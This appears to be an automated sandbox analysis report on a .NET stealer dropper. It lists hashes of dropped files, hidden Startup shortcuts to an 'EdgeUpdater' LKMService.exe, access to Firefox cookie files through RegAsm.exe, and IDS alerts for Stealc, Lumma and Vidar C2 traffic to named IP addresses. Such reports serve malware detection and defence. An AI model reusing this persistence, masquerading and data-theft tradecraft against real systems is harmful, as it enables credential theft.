=...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f9e2a266755b42c3bc3ef1e60c8ae0cc.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:44 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.956454287066985
Encrypted:	false
SSDEEP:	24:8PnOpd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8PnOr0ROOxrRvggyF
MD5:	91838052F3F3639366836A554036A76F
SHA1:	D3610893F0E7692A22281B7FD735527AB149859E
SHA-256:	E0FBB00B0C0A4D72CD5B436C41A249AC66F175BE92F534549FC798DFEC245432
SHA-512:	BE707F040643FF6A0A681B215804A5D4FB71D26E4541EC65B53C411E1EB57A4E2C99E3C52578210180AEB2B93093CAC68EB7A80BE853108EBF8553A7B1583482
Malicious:	false
Preview:	L..................F...."...o.k......"......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fa485a82d12e4fd789c2445af41212da.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:02 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.949418024755783
Encrypted:	false
SSDEEP:	24:8P/A3pd+E0R+gKZz2NglhW8Apfv/42eVvqyFm:8P/er0RAzwRvggyF
MD5:	64091203CCB765F0A7AC68166435981A
SHA1:	466668D71C25B685B8B8340F2885A70425494E11
SHA-256:	A655F8E12AEAAB0BDBF30E952BB6C467F289F7D1DBEB029EFD7093E162C18ABD
SHA-512:	8D70C0DB4C9EF3CEE5DB6585C3557FB56276F78F8AF8F42FC4C16F2C1199AC8C72F4BD1A903F8C6B14793D94080D73B270D8CC17535EDCBB35B7CB5308041866
Malicious:	false
Preview:	L..................F...."...o.k.....q.n.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY =..EDGEUP~1..H......BY =BY =..........................O ..E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fbd1b2c6a63046a59602cb7979d3e186.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:43:00 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.947014597786571
Encrypted:	false
SSDEEP:	24:8PeqaFpd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8PeqaFr0ROOxrRvggyF
MD5:	8B6587860D11E7F7C0BBC9770A446636
SHA1:	76F41B1144A96D238673A5DF76D117515291A175
SHA-256:	4C64A5D072F7AA6276AC0C8A9EEB0FC366473E6E93EAF4313B1418C1D96DE297
SHA-512:	D8CF358E486A07587BB09C7618603DE85B9B203F54EB7F4349DB8892A95A97A1A9E9715FA9201F7BC018BFEE2420F8B805C8B128113EEB1B48F2157801FD788B
Malicious:	false
Preview:	L..................F...."...o.k....B........0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....:N..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	423840
Entropy (8bit):	7.988954975057422
Encrypted:	false
SSDEEP:	12288:hQq9JI/vWhNOAE2wMUZ0iR4HHW02AEPzYhDU9qcEO:5JXfOATt3202AHhD5ct
MD5:	237AF39F8B579AAD0205F6174BB96239
SHA1:	7AAD40783BE4F593A2883B6A66F66F5F624D4550
SHA-256:	836CE1411F26919F8FB95548D03C2F4DFD658FC525DFE21C7BE8ED65F81A5957
SHA-512:	DF46993A2029B22CBC88B289398265494C5A8F54EA803E15B7B12F4A7BC98152DF298916D341E3C3590329B35A806788AE294BAE2E6832F2A2AC426D0145504D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................. ...........>... ...@....@.. ....................................`..................................>..S....@..B...........xQ..(&...`......`=............................................... ............... ..H............text........ ... .................. ..`.rsrc...B....@......."..............@..@.reloc.......`.......&..............@..B.................>......H.......@+.. ............................................................B,..Je.8.........Xf..3..Zm...v.$:...r......X...M..6'4..,.O.T...!..B..C.\|....[.{2.y.d?1d2.m.......U5A9.3.B.[l.t..P3f.A.y.z$.[Yi.............[..v..\..Bq..g.^.....pd....{....t.}.y..[P....v.y.H. ..@.'2.^..4.h..7!.O.w.Jx...i....v...?.G.6^...`.q8..NZ..-.T...u...W1z.....K.._.....7.-...H.<fz(..7..-..@.{.%.x.B.#.."...S4.,N.........iO......#T......jN.F.A......h.j..p..."&.xU-...`....4....

C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	344992
Entropy (8bit):	7.9840811629834345
Encrypted:	false
SSDEEP:	6144:X5EAq+eU9BhaikesEDBVqaDf5kLslwEIF4TN4ha/qks1l9QjjmQ+Nb/Q5AQEO:J5vlBQB/EDBkaDRkyZIF4TN4o/29QjK0
MD5:	022CC85ED0F56A3F3E8AEC4AE3B80A71
SHA1:	A89B9C39C5F6FCB6E770CEA9491BF7A97F0F012D
SHA-256:	BB28BB63ED34A3B4F97A0A26BDA8A7A7C60F961010C795007EDC52576B89E4D3
SHA-512:	AC549B9CF50E631BAE01152DB4523FDAB55F426EE77177AF900B088244665E28DE03C10784FE9DB33A2478BEE0D96BD50E5A668D2A2BFDFF3E8706AA8F5D71A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ... ....@.. .......................`.......7....`.....................................S.... ..B...........x...(&...@......`................................................ ............... ..H............text........ ...................... ..`.rsrc...B.... ......................@..@.reloc.......@......................@..B........................H.......@... ..............................................................+>J]..y.. 9..=...5..t...S..4;g./.k.T.l..>GP.OC.B.$...!.xV...X.,.7.D.qRY..\.8..`M.c....6...`...D6by..e>.Ty...."lZD;...6....FN6T.^:...z._.'.._......r;...n8...Ua..<.D8..4.OvZ.2.j;o.9...;.a.}.y.R......\......`2.fv.J.C.*D.cu..'.^,b......F^I..e..H.N!...&..x..D...."...5....z.J..sE.......H....b&DI..9..Z...l.{,w.F....-. O....2...Ak.8.<.!@@a'...2...A....%.l..?.a<y.....6zZ.....'..7..Q....v>

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.584122426061968
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	file.exe
File size:	27'136 bytes
MD5:	6c7708b26af0449f2cd1caef277dce2e
SHA1:	1720b6892ef3825e39f7178584fff858ec3f73e9
SHA256:	3b3cb4613c52cc846462df404477b19a9454dc8d43bfb67b68c6e090bb012a4b
SHA512:	5231aa02b98ec9e816ae1ff01e63b085828cb9f3946cb432f5014a6475e4d1f39f04d664fc87dd01c3fe94a38771e4556e578a085644a17c0033d978788b2093
SSDEEP:	384:6lHvmSg18ojO6SGQocpP8oD1wB6fct/oKH+egRtxgjw9M9ekamBrtEM3o0lfWZF1:kH+86O50oIFHZgRz19uhtno0lfWl
TLSH:	C1C2285466ACA437DE1F0FBCDCB1525387719317EA22F24E1CCCD1E42A86B8189492EF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..`............... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x407fae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x8B2EB2E2 [Wed Dec 30 13:04:34 2043 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, byte ptr [eax]
adc byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax+00000018h], al
push eax
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add dword ptr [eax], eax
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax+00h], ch
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7f58	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x59e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x5fb4	0x6000	a9c6068964df6b6a5dd853c94d13658c	False	0.440185546875	data	5.755585974017591	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x59e	0x600	0a39fc6384ab0d8254d951366160ff9d	False	0.4186197916666667	data	4.060044360338592	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa000	0xc	0x200	50143f959e313f21abb0dad11ecdf638	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x80a0	0x314	data			0.4352791878172589
RT_MANIFEST	0x83b4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-02T09:41:02.359210+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49731	172.67.74.152	80	TCP
2024-10-02T09:41:16.056110+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49743	147.45.44.104	80	TCP
2024-10-02T09:41:16.056346+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49744	147.45.44.104	80	TCP
2024-10-02T09:41:20.409769+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:20.637585+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:20.647305+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	46.8.231.109	80	192.168.2.4	49749	TCP
2024-10-02T09:41:20.821331+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:20.829184+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	46.8.231.109	80	192.168.2.4	49749	TCP
2024-10-02T09:41:21.245684+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:21.431763+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:24.521795+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:25.361105+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:25.956114+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:26.461890+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:28.066658+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:28.463039+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:31.744757+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49758	147.45.44.104	80	TCP
2024-10-02T09:41:34.671175+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49760	172.67.208.141	443	TCP
2024-10-02T09:41:34.671175+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49760	172.67.208.141	443	TCP
2024-10-02T09:41:34.848545+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49761	49.12.197.9	443	TCP
2024-10-02T09:41:35.665991+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49762	188.114.96.3	443	TCP
2024-10-02T09:41:35.665991+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49762	188.114.96.3	443	TCP
2024-10-02T09:41:36.016611+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49763	49.12.197.9	443	TCP
2024-10-02T09:41:36.738752+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49765	104.21.56.150	443	TCP
2024-10-02T09:41:36.738752+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49765	104.21.56.150	443	TCP
2024-10-02T09:41:36.859290+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49731	172.67.74.152	80	TCP
2024-10-02T09:41:37.380683+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49766	49.12.197.9	443	TCP
2024-10-02T09:41:37.666044+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49767	104.21.84.18	443	TCP
2024-10-02T09:41:37.666044+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49767	104.21.84.18	443	TCP
2024-10-02T09:41:37.859275+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49731	172.67.74.152	80	TCP
2024-10-02T09:41:38.617530+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49769	104.21.18.193	443	TCP
2024-10-02T09:41:38.617530+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49769	104.21.18.193	443	TCP
2024-10-02T09:41:38.757464+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49771	49.12.197.9	443	TCP
2024-10-02T09:41:39.460254+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.4	49771	49.12.197.9	443	TCP
2024-10-02T09:41:39.460433+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	49.12.197.9	443	192.168.2.4	49771	TCP
2024-10-02T09:41:39.614449+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49772	172.67.195.67	443	TCP
2024-10-02T09:41:39.614449+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49772	172.67.195.67	443	TCP
2024-10-02T09:41:40.226986+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49773	49.12.197.9	443	TCP
2024-10-02T09:41:40.735439+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49774	104.21.17.174	443	TCP
2024-10-02T09:41:40.735439+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49774	104.21.17.174	443	TCP
2024-10-02T09:41:40.953212+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	49.12.197.9	443	192.168.2.4	49773	TCP
2024-10-02T09:41:41.988085+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49776	49.12.197.9	443	TCP
2024-10-02T09:41:42.874868+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49777	104.21.16.12	443	TCP
2024-10-02T09:41:42.874868+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49777	104.21.16.12	443	TCP
2024-10-02T09:41:42.985234+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49778	49.12.197.9	443	TCP
2024-10-02T09:41:45.987426+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49779	49.12.197.9	443	TCP
2024-10-02T09:41:47.457158+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49780	49.12.197.9	443	TCP
2024-10-02T09:41:48.209550+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49781	49.12.197.9	443	TCP
2024-10-02T09:41:49.259118+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49782	49.12.197.9	443	TCP
2024-10-02T09:41:50.381063+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49783	49.12.197.9	443	TCP
2024-10-02T09:41:52.265394+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49784	49.12.197.9	443	TCP
2024-10-02T09:41:54.001607+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49785	49.12.197.9	443	TCP
2024-10-02T09:41:55.683254+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49787	49.12.197.9	443	TCP
2024-10-02T09:41:57.353797+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49788	49.12.197.9	443	TCP
2024-10-02T09:41:58.678015+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49789	49.12.197.9	443	TCP
2024-10-02T09:42:02.054842+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49790	49.12.197.9	443	TCP
2024-10-02T09:42:03.779029+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49791	49.12.197.9	443	TCP
2024-10-02T09:42:05.557439+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49792	49.12.197.9	443	TCP
2024-10-02T09:42:06.998724+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49793	49.12.197.9	443	TCP
2024-10-02T09:42:09.050279+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49794	49.12.197.9	443	TCP
2024-10-02T09:42:09.828134+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49731	172.67.74.152	80	TCP
2024-10-02T09:42:11.046865+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49731	172.67.74.152	80	TCP
2024-10-02T09:42:11.654658+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49797	49.12.197.9	443	TCP
2024-10-02T09:42:13.120133+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49799	147.45.44.104	80	TCP
2024-10-02T09:42:15.383085+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49800	49.12.197.9	443	TCP
2024-10-02T09:42:17.992206+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49803	49.12.197.9	443	TCP
2024-10-02T09:42:17.992636+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49802	172.67.208.141	443	TCP
